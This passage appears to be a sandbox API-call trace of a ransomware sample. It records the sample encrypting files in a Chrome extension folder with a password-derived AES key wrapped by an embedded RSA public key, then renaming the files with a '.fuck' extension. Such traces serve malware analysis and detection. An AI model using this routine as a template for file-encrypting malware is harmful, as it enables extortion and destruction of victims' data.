CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.913] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.913] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x120, lpOverlapped=0x0) returned 1 [0261.913] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x120, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x130) returned 1 [0261.913] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x130, lpOverlapped=0x0) returned 1 [0261.913] CloseHandle (hObject=0x5d64) returned 1 [0261.913] CloseHandle (hObject=0x5d50) returned 1 [0261.913] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), bFailIfExists=0) returned 1 [0261.916] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js", dwFileAttributes=0x0) returned 1 [0261.916] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.gsg")) returned 1 [0261.918] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.fuck")) returned 1 [0261.919] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.919] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0261.919] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.919] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.919] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.919] GetLastError () returned 0x0 [0261.919] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json")) returned 0x20 [0261.920] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json", dwFileAttributes=0x80) returned 1 [0261.920] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.921] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.922] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.gsg", dwFileAttributes=0x2) returned 1 [0261.922] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.924] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.924] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0261.925] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.925] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fc40) returned 1 [0261.925] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.925] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.925] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e72718) returned 1 [0261.925] CryptImportPublicKeyInfo (in: hCryptProv=0x2e72718, dwCertEncodingType=0x1, pInfo=0x2eaca60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaca90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaca98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7dec0) returned 1 [0261.925] CryptEncrypt (in: hKey=0x2e7dec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.925] CryptEncrypt (in: hKey=0x2e7dec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72be0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e72be0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.925] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e72be0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e72be0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.926] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.934] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.934] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.936] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.937] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.937] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.937] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x1f8, lpOverlapped=0x0) returned 1 [0261.937] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x1f8, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x200) returned 1 [0261.937] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x200, lpOverlapped=0x0) returned 1 [0261.937] CloseHandle (hObject=0x5d50) returned 1 [0261.937] CloseHandle (hObject=0x5d64) returned 1 [0261.937] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), bFailIfExists=0) returned 1 [0261.939] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json", dwFileAttributes=0x0) returned 1 [0261.940] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.gsg")) returned 1 [0261.941] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.fuck")) returned 1 [0261.942] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.942] CryptDestroyKey (hKey=0x2e7fc40) returned 1 [0261.942] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.942] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.942] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.942] GetLastError () returned 0x0 [0261.942] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css")) returned 0x20 [0261.942] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css", dwFileAttributes=0x80) returned 1 [0261.943] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.943] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.944] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.gsg", dwFileAttributes=0x2) returned 1 [0261.945] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.946] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.946] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0261.946] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.946] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0261.947] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.947] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.947] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e72b58) returned 1 [0261.947] CryptImportPublicKeyInfo (in: hCryptProv=0x2e72b58, dwCertEncodingType=0x1, pInfo=0x2eab200*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab230*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab238*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7e000) returned 1 [0261.947] CryptEncrypt (in: hKey=0x2e7e000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.947] CryptEncrypt (in: hKey=0x2e7e000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e727a0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e727a0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.947] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e727a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e727a0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.948] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.966] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.966] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.969] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.969] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.969] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.969] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.969] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.969] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.969] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.969] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.969] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.970] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.970] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.970] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.970] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.970] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.970] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.971] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.971] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.971] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.971] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.971] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.971] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.971] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.971] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.971] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 